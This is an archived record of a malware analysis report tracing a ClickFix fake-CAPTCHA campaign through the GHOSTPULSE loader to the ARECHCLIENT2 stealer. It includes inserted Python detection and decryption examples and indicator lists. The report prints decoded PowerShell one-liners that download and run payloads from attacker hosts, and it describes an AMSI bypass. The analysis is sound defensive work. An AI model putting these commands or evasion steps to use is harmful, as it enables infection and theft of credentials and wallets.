{
	"id": "95f8a1d5-153c-4723-9434-92974a29fc62",
	"created_at": "2026-04-06T00:09:20.879916Z",
	"updated_at": "2026-04-10T03:20:47.703425Z",
	"deleted_at": null,
	"sha1_hash": "fed5336516fd55a91a02fa46f6ed22c66040cbfc",
	"title": "A Wretch Client: From ClickFix deception to information stealer deployment",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5844091,
	"plain_text": "A Wretch Client: From ClickFix deception to information stealer deployment\r\nBy Salim Bitam\r\nPublished: 2025-06-18 · Archived: 2026-04-05 23:22:45 UTC\r\nPreamble\r\nElastic Security Labs has observed the ClickFix technique gaining popularity in multi-stage campaigns that deliver a range of malware through social engineering.\r\nOur threat intelligence indicates a substantial surge in activity leveraging ClickFix as a primary initial access vector. This social engineering technique tricks users into copying and pasting a malicious PowerShell command, which results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience with malware and infostealers such as LUMMA and ARECHCLIENT2, a family first observed in 2019 that is now experiencing a significant surge in popularity.\r\nThis post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.\r\nKey takeaways\r\nClickFix: Remains a highly effective and prevalent initial access method.\r\nGHOSTPULSE: Continues to be widely used as a multi-stage payload loader and is under ongoing development, with new modules and improved evasion techniques. Notably, its initial configuration is now delivered within an encrypted file.\r\nARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.\r\nThe Initial Hook: Deconstructing ClickFix's Social Engineering\r\nEvery successful multi-stage attack begins with a foothold, and in many recent campaigns that initial step has been satisfied by ClickFix. 
ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the launchpad for compromise.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 1 of 15\r\nFigure: Fake captcha\r\nAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on their own systems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts, often disguised as browser updates, system errors, or CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, the user is instructed to copy a seemingly harmless \"fix\" (in reality a malicious PowerShell command) and paste it directly into the operating system's Run dialog. Because the user initiates the process, this seemingly voluntary action bypasses many traditional perimeter defenses.\r\nClickFix first emerged on the threat landscape in March 2024, rapidly gained traction, exploded in prevalence throughout 2024, and has continued its aggressive ascent into 2025. Its effectiveness lies in exploiting \"verification fatigue\", the subconscious habit users develop of mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent \"fix it\" button, many users, conditioned by routine, simply comply without scrutinizing the underlying request. 
This makes ClickFix an incredibly potent initial access vector, favored by a broad spectrum of threat actors because of its high success rate in breaching initial defenses.\r\nOur recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malware deployment, further underscoring its versatility and widespread adoption across the threat landscape.\r\nOur internal telemetry at Elastic corroborates this trend, showing a significant volume of ClickFix-related alerts across observed environments, particularly in Q1 2025. We noted an increase in attempts compared to the previous quarter, predominantly focused on the deployment of mass-infection malware such as RATs and infostealers.\r\nA ClickFix Campaign's Journey to ARECHCLIENT2\r\nThe ClickFix technique often serves as the first step in a larger, multi-stage attack, and a campaign we recently analyzed shows this progression clearly. The operation begins with a ClickFix lure that tricks users into starting the infection process. After gaining initial access, the campaign deploys an updated version of the GHOSTPULSE loader (also known as HIJACKLOADER and IDATLOADER). This loader then brings in an intermediate .NET loader. 
This additional stage is responsible for delivering the final payload: an ARECHCLIENT2 (SECTOPRAT) sample loaded directly into memory.\r\nThis attack chain demonstrates how adversaries combine social engineering with stealthy loader capabilities and multiple execution layers, ultimately to steal data and gain remote control.\r\nExecution flow\r\nWe observed this exact campaign in our telemetry, which gave us a direct look at its real-world execution and the sequence of its components.\r\nFigure: Execution flow in Kibana\r\nTechnical analysis of the infection\r\nThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS CAPTCHA verification.\r\nWe observed two hosting locations, both resolving to 50.57.243[.]90, that deliver the same initial payload: https://clients[.]dealeronlinemarketing[.]com/captcha/ and https://clients[.]contology[.]com/captcha/.\r\nUser interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has been closely tracking this loader, and our previous research (2023 and 2024) provided a detailed look at its initial capabilities.\r\nFigure: Fake captcha hosted by contology[.]com\r\nThe webpage is a heavily obfuscated JavaScript script that generates the HTML and a second JavaScript payload, which copies a PowerShell command to the clipboard.\r\nFigure: Obfuscated JavaScript of the captcha page\r\nInspecting the runtime HTML in a browser shows the front end of the page, but not the script that runs after the user clicks the checkbox labeled Verify you are human.\r\nFigure: HTML code of the captcha page\r\nA simple solution is to run the page in a debugger and retrieve the information during execution. The second JavaScript payload is also obfuscated, but two interesting functions are easy to identify. 
The first function, runClickedCheckboxEffects, retrieves the machine's public IP address by querying https://api.ipify[.]org?format=json, then sends that IP address to the attacker's infrastructure at https://koonenmagaziner[.]click/counter/<IP_address> to log the infection.\r\nFigure: JavaScript of the captcha page\r\nThe second function copies a base64-encoded PowerShell command to the clipboard.\r\nFigure: Command copied to the clipboard by the JavaScript script\r\nFigure: PowerShell command copied to the clipboard\r\nBase64-decoded, the copied command is:\r\n(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iex\r\nWhen executed, it fetches and runs the following PowerShell script:\r\nInvoke-WebRequest -Uri \"https://bitly[.]cx/iddD\" -OutFile \"$env:TEMP\\ComponentStyle.zip\"; Expand-Archive -Path \"$env:TEMP/ComponentStyle.zip\" -DestinationPath \"$env:TEMP\"; \u0026 \"$env:TEMP\\crystall\\Crysta_x86.exe\"\r\nThe observed infection process deploys GHOSTPULSE as follows. After the user executes the PowerShell command copied by ClickFix, the initial one-liner fetches and runs the second script. That script downloads a ZIP archive (ComponentStyle.zip) from a remote location and extracts it into a temporary directory on the victim's system.\r\nThe extracted contents include the components for GHOSTPULSE: a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DivXDownloadManager.dll). This setup relies on DLL sideloading, a technique in which the legitimate executable loads the malicious DLL. 
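Defenders usually see the ClickFix step above first as a process-creation event: explorer.exe (the Run dialog) spawning PowerShell with a base64-wrapped download-and-execute one-liner. The Python below is an added example written for this page, not Elastic's rule logic or the page's own tooling. The event field names, the two wrapper forms it unwraps (-EncodedCommand with UTF-16LE, and an inline FromBase64String call with UTF-8), and the three sample events are constructed assumptions; only the decoded one-liner comes from the page. It unwraps the command, pulls out the URLs it reaches, and applies a simple heuristic in the spirit of the Suspicious Command Shell Execution via Windows Run rule listed under Detection.

```python
import base64
import re

# Added example: triage of process-creation events for the ClickFix paste step.
# The event fields (parent, image, cmdline) and the wrapper forms handled here are assumptions,
# not a description of Elastic's rule logic or of this campaign's exact command line.

QUOTES = chr(39) + chr(34)   # single and double quote, kept out of the source text
ENC_RE = re.compile('(?i)-e(?:c|nc|ncodedcommand)?[ ]+([A-Za-z0-9+/=]+)')
INLINE_B64_RE = re.compile('(?i)FromBase64String[(]([^)]+)[)]')
DOWNLOAD_RE = re.compile('(?i)(?<![a-z0-9])(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile)(?![a-z0-9])')
EXEC_RE = re.compile('(?i)(?<![a-z0-9])(invoke-expression|iex)(?![a-z0-9])')
URL_RE = re.compile('https?://[^ ' + QUOTES + '();|<>]+')
SHELLS = ('powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe')


def decode_blob(blob):
    '''Decode base64 that is UTF-16LE (-EncodedCommand) or UTF-8 (inline FromBase64String).'''
    raw = base64.b64decode(blob + '=' * (-len(blob) % 4))
    # UTF-16LE ASCII text carries a zero byte in every odd position; use that as the discriminator
    if len(raw) >= 2 and raw[1::2].count(0) * 2 >= len(raw):
        return raw.decode('utf-16-le', 'replace')
    return raw.decode('utf-8', 'replace')


def decode_command_line(cmdline):
    '''Return the PowerShell that actually runs: the unwrapped payload if one is base64-wrapped, else the raw line.'''
    m = ENC_RE.search(cmdline)
    if m:
        return decode_blob(m.group(1))
    m = INLINE_B64_RE.search(cmdline)
    if m:
        return decode_blob(m.group(1).strip(' ' + QUOTES))
    return cmdline


def basename(path):
    '''Last path component, tolerating both Windows and POSIX separators.'''
    return path.replace(chr(92), '/').rsplit('/', 1)[-1].lower()


def triage(event):
    '''Score one event; returns the verdict plus the decoded command and any URLs it reaches.'''
    decoded = decode_command_line(event['cmdline'])
    text = event['cmdline'] + ' ' + decoded
    reasons = []
    if basename(event['parent']) == 'explorer.exe' and basename(event['image']) in SHELLS:
        reasons.append('shell launched from explorer.exe (Run dialog paste)')
    if decoded != event['cmdline']:
        reasons.append('base64-wrapped command')
    if DOWNLOAD_RE.search(text) and EXEC_RE.search(text):
        reasons.append('download-and-execute pattern')
    # Heuristic: a Run-dialog shell alone is normal admin behavior; with wrapping or fetch-and-run it is ClickFix-shaped
    suspicious = len(reasons) >= 2 and reasons[0].startswith('shell launched')
    return {'suspicious': suspicious, 'reasons': reasons, 'decoded': decoded, 'urls': sorted(set(URL_RE.findall(text)))}


# The page's decoded one-liner, used as the wrapped payload in the constructed events below
PAYLOAD = '''(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iex'''
PS_IMAGE = 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe'

SAMPLE_EVENTS = [   # constructed sample events, not telemetry
    {'parent': 'C:/Windows/explorer.exe', 'image': PS_IMAGE,   # -enc wrapper (UTF-16LE)
     'cmdline': 'powershell.exe -w hidden -enc ' + base64.b64encode(PAYLOAD.encode('utf-16-le')).decode()},
    {'parent': 'C:/Windows/explorer.exe', 'image': PS_IMAGE,   # inline FromBase64String wrapper (UTF-8)
     'cmdline': 'powershell -c [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(' + chr(39)
                + base64.b64encode(PAYLOAD.encode()).decode() + chr(39) + ')) | iex'},
    {'parent': 'C:/Windows/explorer.exe', 'image': PS_IMAGE,   # benign: admin launching a script from Run
     'cmdline': 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:/scripts/backup.ps1'},
]


def triage_all(events=SAMPLE_EVENTS):
    '''Run the triage over a list of events and return the verdicts in order.'''
    return [triage(e) for e in events]


if __name__ == '__main__':
    for verdict in triage_all():
        print(verdict['suspicious'], verdict['reasons'], verdict['urls'])
```

The point of decoding before matching is that the indicators (the download cmdlet, the iex pipe, the URL) are invisible in the raw command line of the -EncodedCommand form; the third event shows why the Run-dialog parent on its own is not enough to alert on.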
The archive also contains Heeschamjet.rc, the IDAT PNG file that holds the next stage's payloads in encrypted form, and Shonomteak.bxi, an encrypted file the loader uses to obtain the stage 2 code and its configuration structure.\r\nFigure: Content of ComponentStyle.zip\r\nGHOSTPULSE\r\nStage 1\r\nGHOSTPULSE is malware dating back to 2023. It has continuously received updates, including a new way to store its encrypted payload in an image by embedding the payload in the PNG's pixels, as detailed in Elastic's 2024 research blog post, and new modules documented in Zscaler's research.\r\nThe sample used in this campaign shipped with an additional encrypted file named Shonomteak.bxi. During stage 1, the loader decrypts this file using a DWORD addition operation with a value stored in the file itself.\r\nFigure: Decryption of the Shonomteak.bxi file\r\nThe malware then extracts the stage 2 code from the decrypted Shonomteak.bxi and injects it into a library it loads with LoadLibraryA. The library name is stored in the same decrypted file; in our case it is vssapi.dll.\r\nThe stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration that was inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process, set to True in our case.\r\nFigure: Structure used in stage 2\r\nStage 2\r\nWhen b_detect_process is True, the malware runs a function that checks whether any process from a list is running. If one is detected, execution is delayed by 5 seconds.\r\nFigure: Delays execution by 5 seconds\r\nIn previously analyzed GHOSTPULSE samples, the configuration was hardcoded directly in the binary. 
This sample, on the other hand, stores all the information the malware needs to function in Shonomteak.bxi, including:\r\nHashes of the DLL names and Windows APIs it resolves\r\nIDAT tag: used to find the start of the encrypted data in the PNG file\r\nIDAT string: simply “IDAT”\r\nHashes of the processes to scan for\r\nFigure: API-resolution hashes stored in the GHOSTPULSE configuration rather than hardcoded\r\nFinal thoughts on GHOSTPULSE\r\nGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the method we discovered in 2024 that stores the payload in pixel data, may indicate that the builder for this family keeps both options available when compiling new samples.\r\nOur configuration extractor performs payload extraction using both methods and can be used for mass analysis of samples. You can find the updated tool in our labs-releases repository.\r\nFigure: Payload extraction from the GHOSTPULSE sample\r\nARECHCLIENT2\r\nIn 2025, we observed a notable increase in activity involving ARECHCLIENT2 (SectopRAT). This heavily obfuscated .NET remote access tool, first identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE through the ClickFix social engineering technique. 
Our prior research documented GHOSTPULSE delivering ARECHCLIENT2 as early as 2023.\r\nThe payload GHOSTPULSE deploys into a newly created process is a native x86 loader for .NET code, which in turn loads ARECHCLIENT2.\r\nThe loader goes through three steps:\r\nPatching AMSI\r\nExtracting and decrypting the payload\r\nLoading the CLR, then reflectively loading ARECHCLIENT2\r\nFigure: Main entry of the .NET loader\r\nInterestingly, its debugging-oriented error handling is still present, in the form of message boxes displayed with the MessageBoxA API. For example, when the loader fails to find the .tls section, a message box with the string \"D1\" is displayed.\r\nFigure: Debugging/error messages through a message box\r\nThe following table lists all the error messages and their meaning:\r\nMessage Description\r\nF1 LoadLibraryExW hooking failed\r\nF2 AMSI patching failed\r\nD1 Unable to find .tls section\r\nW2 Failed to load CLR\r\nThe loader sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then hooks AmsiScanBuffer, effectively bypassing AMSI.\r\nFigure: Hooking LoadLibraryExW\r\nNext, the loader locates the .tls section in memory by parsing the PE headers. The first 0x40 bytes of this section serve as the XOR key, and the remaining bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts.\r\nFigure: Payload decryption routine\r\nFinally, it loads the .NET Common Language Runtime (CLR) in memory with the CLRCreateInstance Windows API before reflectively loading ARECHCLIENT2.\r\nARECHCLIENT2 is a potent remote access trojan and infostealer designed to target a broad spectrum of sensitive user data and system information. 
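The two unmasking steps described above, the DWORD-addition decryption of Shonomteak.bxi in GHOSTPULSE stage 1 and the .NET loader's XOR of the .tls body with the section's first 0x40 bytes, can be reproduced offline. The Python below is an added example written for this page, not Elastic's extractor and not code from either loader. The page gives the operations but not the byte layout of Shonomteak.bxi, so the key-at-offset-0 layout, the direction of the addition, the synthetic PE carrying a .tls section, the stand-in payload and the stand-in configuration are all constructed assumptions; the 0x40-byte key length and the repeating XOR over the rest of the section follow the text.

```python
import struct

# Added example: the two unmasking steps this post describes, reproduced offline.
# Assumed layouts (the page names the operations but not the byte layout):
#   Shonomteak.bxi style: key DWORD at offset 0, every following little-endian DWORD decrypted by adding the key mod 2^32
#   .tls section style: first 0x40 bytes are the XOR key, the remainder is the payload XORed with that repeating key

TLS_KEY_LEN = 0x40


def dword_add(blob, key):
    '''Add key (mod 2^32) to every little-endian DWORD; trailing bytes that do not fill a DWORD pass through.'''
    n = len(blob) // 4
    words = struct.unpack_from('<%dI' % n, blob)
    return struct.pack('<%dI' % n, *[(w + key) & 0xFFFFFFFF for w in words]) + blob[4 * n:]


def decrypt_stage1_file(blob):
    '''Recover the stage 2 material from a Shonomteak.bxi-style file (assumed key-at-offset-0 layout).'''
    key = struct.unpack_from('<I', blob)[0]
    return dword_add(blob[4:], key)


def decrypt_tls_payload(tls_section):
    '''Split the .tls section into its 0x40-byte key and encrypted body, then XOR the body with the repeating key.'''
    key, body = tls_section[:TLS_KEY_LEN], tls_section[TLS_KEY_LEN:]
    if len(key) != TLS_KEY_LEN:
        raise ValueError('.tls section shorter than the key')
    return bytes(b ^ key[i % TLS_KEY_LEN] for i, b in enumerate(body))


def looks_like_pe(buf):
    '''Sanity check on a decrypted blob: MZ header and a PE signature at e_lfanew.'''
    if len(buf) < 0x40 or buf[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b'PE' + bytes(2)


def find_section(pe, name):
    '''Return the raw bytes of a named section by walking the section table of an on-disk PE image.'''
    e_lfanew = struct.unpack_from('<I', pe, 0x3C)[0]
    num_sections = struct.unpack_from('<H', pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from('<H', pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    for i in range(num_sections):
        hdr = pe[table + 40 * i:table + 40 * (i + 1)]
        if hdr[:8].rstrip(bytes(1)) == name:
            raw_size, raw_ptr = struct.unpack_from('<II', hdr, 16)   # SizeOfRawData, PointerToRawData
            return pe[raw_ptr:raw_ptr + raw_size]
    return None


def build_fake_payload():
    '''Constructed stand-in for the embedded sample: just enough header to satisfy looks_like_pe.'''
    buf = bytearray(0x80)
    buf[:2] = b'MZ'
    struct.pack_into('<I', buf, 0x3C, 0x40)
    buf[0x40:0x44] = b'PE' + bytes(2)
    buf[0x44:] = b'constructed payload body'.ljust(0x80 - 0x44, b'.')
    return bytes(buf)


def build_fake_loader(tls_section):
    '''Constructed minimal PE image (not runnable) whose only section is .tls holding tls_section.'''
    e_lfanew, opt_size = 0x40, 0
    table = e_lfanew + 24 + opt_size
    raw_ptr = table + 40
    hdr = bytearray(raw_ptr)
    hdr[:2] = b'MZ'
    struct.pack_into('<I', hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b'PE' + bytes(2)
    struct.pack_into('<HH', hdr, e_lfanew + 4, 0x14C, 1)      # Machine i386, NumberOfSections 1
    struct.pack_into('<H', hdr, e_lfanew + 20, opt_size)
    hdr[table:table + 8] = b'.tls'.ljust(8, bytes(1))
    struct.pack_into('<II', hdr, table + 16, len(tls_section), raw_ptr)
    return bytes(hdr) + tls_section


def demo():
    '''Round-trip both routines on constructed data and return what was recovered.'''
    key = bytes((i * 37 + 11) & 0xFF for i in range(TLS_KEY_LEN))   # constructed XOR key
    payload = build_fake_payload()
    loader = build_fake_loader(key + bytes(b ^ key[i % TLS_KEY_LEN] for i, b in enumerate(payload)))
    recovered = decrypt_tls_payload(find_section(loader, b'.tls'))
    config = b'vssapi.dll' + bytes(2)                                    # constructed 12-byte stage 2 material
    stage1_key = 0x1337BEEF
    stage1_file = struct.pack('<I', stage1_key) + dword_add(config, (-stage1_key) & 0xFFFFFFFF)
    return {'payload_is_pe': looks_like_pe(recovered), 'payload': recovered, 'stage1': decrypt_stage1_file(stage1_file)}


if __name__ == '__main__':
    result = demo()
    print(result['payload_is_pe'], result['stage1'])
```

Against a real sample the only parts that change are the inputs: find_section is run on the loader file from disk, and the stage 1 routine needs the real key location once it has been confirmed in the decompiler. The looks_like_pe check is the practical stop condition when guessing a layout: a wrong key or offset will not produce an MZ header with a valid e_lfanew.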
ARECHCLIENT2's core objectives primarily focus on:\r\nCredential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, and autofill data. It also targets credentials for FTP, VPN, Telegram, Discord, and Steam.\r\nFigure: dnSpy view of the StealerSettingConfigParce class\r\nSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version, hardware information, IP address, machine name, and geolocation (city, country, and time zone).\r\nFigure: dnSpy view of the ScanResult class\r\nCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackers remote control over infected systems.\r\nARECHCLIENT2 connects to its primary C2 at 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and retrieves its secondary C2 IP (143.110.230[.]167) from a hardcoded Pastebin link, https://pastebin[.]com/raw/Wg8DHh2x.\r\nFigure: ARECHCLIENT2 configuration from dnSpy\r\nInfrastructure analysis\r\nThe malicious captcha page was hosted under two domains, clients.dealeronlinemarketing[.]com and clients.contology[.]com, under the URIs /captcha and /Client, both pointing to the IP address 50.57.243[.]90.\r\nWe identified that both domains belong to a digital advertising agency with a long operational history. 
Further investigation reveals that the company has consistently used client subdomains to host various content, including PDFs and forms, for advertising purposes.\r\nWe assess that the attacker has likely compromised the server 50.57.243[.]90 and is abusing the company's existing infrastructure and advertising reach to facilitate widespread malicious activity.\r\nFurther down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additional campaign infrastructure. The two servers are hosted on different autonomous systems, AS14061 and AS14956.\r\nPivoting on a shared banner hash (@ValidinLLC's HOST-BANNER_0_HASH, a hash of the web server's response banners) revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 had previously been labeled \"Sectop RAT\" (aka ARECHCLIENT2) by other vendors, as documented in the Maltrail repository.\r\nFigure: ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLC\r\nFocused validation of the most recent occurrences (first seen after June 1, 2025) against VirusTotal shows that community members had already labeled all 13 of them as Sectop RAT C2.\r\nAll these servers share a similar configuration:\r\nRunning Canonical Linux\r\nSSH on 22\r\nUnknown TCP on 443\r\nNginx HTTP on 8080\r\nHTTP on 9000 (C2 port)\r\nFigure: ARECHCLIENT2 C2 Server Profile, courtesy @censysio\r\nThe service on port 9000 returns Windows server headers, whereas the SSH and Nginx HTTP services both identify Ubuntu as the operating system. 
This suggests the C2 sits behind a reverse proxy, protecting the actual server behind disposable front-end redirectors.\r\nARECHCLIENT2 IOC:\r\nHOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20\r\nThis is an active campaign, and its infrastructure has been built and torn down at a high cadence over the last seven months. As of publication, the following C2 nodes are still active:\r\nValue First Seen Last Seen\r\n66.63.187.22 2025-06-15 2025-06-15\r\n45.94.47.164 2025-06-02 2025-06-15\r\n84.200.17.129 2025-06-04 2025-06-15\r\n82.117.255.225 2025-03-14 2025-06-15\r\n45.77.154.115 2025-06-05 2025-06-15\r\n144.172.94.120 2025-05-20 2025-06-15\r\n79.124.62.10 2025-05-15 2025-06-15\r\n82.117.242.178 2025-03-14 2025-06-15\r\n195.82.147.132 2025-04-10 2025-06-15\r\n62.60.247.154 2025-05-18 2025-06-15\r\n91.199.163.74 2025-04-03 2025-06-15\r\n172.86.72.81 2025-03-13 2025-06-15\r\n107.189.24.67 2025-06-02 2025-06-15\r\n143.110.230.167 2025-06-08 2025-06-15\r\n185.156.72.80 2025-05-15 2025-06-15\r\n85.158.110.179 2025-05-11 2025-06-15\r\n144.172.101.228 2025-05-13 2025-06-15\r\n192.124.178.244 2025-06-01 2025-06-15\r\n107.189.18.56 2025-04-27 2025-06-15\r\n194.87.29.62 2025-05-18 2025-06-15\r\n185.156.72.63 2025-06-12 2025-06-12\r\n193.149.176.31 2025-06-08 2025-06-12\r\n45.141.87.249 2025-06-12 2025-06-12\r\n176.126.163.56 2025-05-06 2025-06-12\r\n185.156.72.71 2025-05-15 2025-06-12\r\n91.184.242.37 2025-05-15 2025-06-12\r\n45.141.86.159 2025-05-15 2025-06-12\r\n67.220.72.124 2025-06-05 2025-06-12\r\n45.118.248.29 2025-01-28 2025-06-12\r\n172.105.148.233 2025-06-03 2025-06-10\r\n194.26.27.10 2025-05-06 2025-06-10\r\n45.141.87.212 2025-06-08 2025-06-08\r\n45.141.86.149 2025-05-15 2025-06-08\r\n172.235.190.176 2025-06-08 2025-06-08\r\n45.141.86.82 2024-12-13 2025-06-08\r\n45.141.87.7 2025-05-13 2025-06-06\r\n185.125.50.140 2025-04-06 2025-06-03\r\nConclusion\r\nThis multi-stage campaign leverages ClickFix social engineering for initial access, deploys the GHOSTPULSE loader to deliver an intermediate .NET loader, and culminates in the memory-resident ARECHCLIENT2 payload. This layered attack chain gathers extensive credential, financial, and system data while also granting attackers remote control over compromised machines.\r\nMITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\r\nTactics\r\nTactics represent the why of a technique or sub-technique: the adversary's tactical goal, the reason for performing an action.\r\nInitial Access\r\nExecution\r\nDefense Evasion\r\nCommand and Control\r\nCollection\r\nTechniques\r\nTechniques represent how an adversary achieves a tactical goal by performing an action.\r\nPhishing\r\nSpearphishing Link\r\nUser Execution\r\nMalicious Link\r\nMalicious File\r\nCommand and Scripting Interpreter\r\nPowerShell\r\nDeobfuscation/Decoding\r\nDLL Sideloading\r\nReflective Loading\r\nUser Interaction\r\nIngress Tool Transfer\r\nSystem Information Discovery\r\nProcess Discovery\r\nSteal Web Session Cookie\r\nDetection\r\nElastic Defend detects this threat with the following behavior protection rules:\r\nSuspicious Command Shell Execution via Windows Run\r\nDNS Query to Suspicious Top Level Domain\r\nLibrary Load of a File Written by a Signed Binary Proxy\r\nConnection to WebService by a Signed Binary Proxy\r\nPotential Browser Information Discovery\r\nYARA\r\nWindows_Trojan_GhostPulse\r\nWindows_Trojan_Arechclient2\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable Type Name / Reference\r\nclients.dealeronlinemarketing[.]com domain Captcha subdomain\r\nclients.contology[.]com domain Captcha subdomain\r\nkoonenmagaziner[.]click domain Infection logging endpoint\r\n50.57.243[.]90 ipv4-addr clients.dealeronlinemarketing[.]com \u0026 clients.contology[.]com\r\n144.172.97[.]2 ipv4-addr ARECHCLIENT2 C\u0026C\r\n143.110.230[.]167 ipv4-addr ARECHCLIENT2 C\u0026C\r\npastebin[.]com/raw/Wg8DHh2x url Contains ARECHCLIENT2 C2 IP\r\n2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a SHA-256 DivXDownloadManager.dll GHOSTPULSE\r\na8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 SHA-256 Heeschamjiet.rc PNG GHOSTPULSE\r\nf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 SHA-256 DOTNET LOADER\r\n4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 SHA-256 ARECHCLIENT2\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://x.com/SI_FalconTeam/status/1915790796948643929\r\nhttps://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics\r\nSource: https://www.elastic.co/security-labs/a-wretch-client",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/a-wretch-client"
	],
	"report_names": [
		"a-wretch-client"
	],
	"threat_actors": [],
	"ts_created_at": 1775434160,
	"ts_updated_at": 1775791247,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fed5336516fd55a91a02fa46f6ed22c66040cbfc.pdf",
		"text": "https://archive.orkl.eu/fed5336516fd55a91a02fa46f6ed22c66040cbfc.txt",
		"img": "https://archive.orkl.eu/fed5336516fd55a91a02fa46f6ed22c66040cbfc.jpg"
	}
}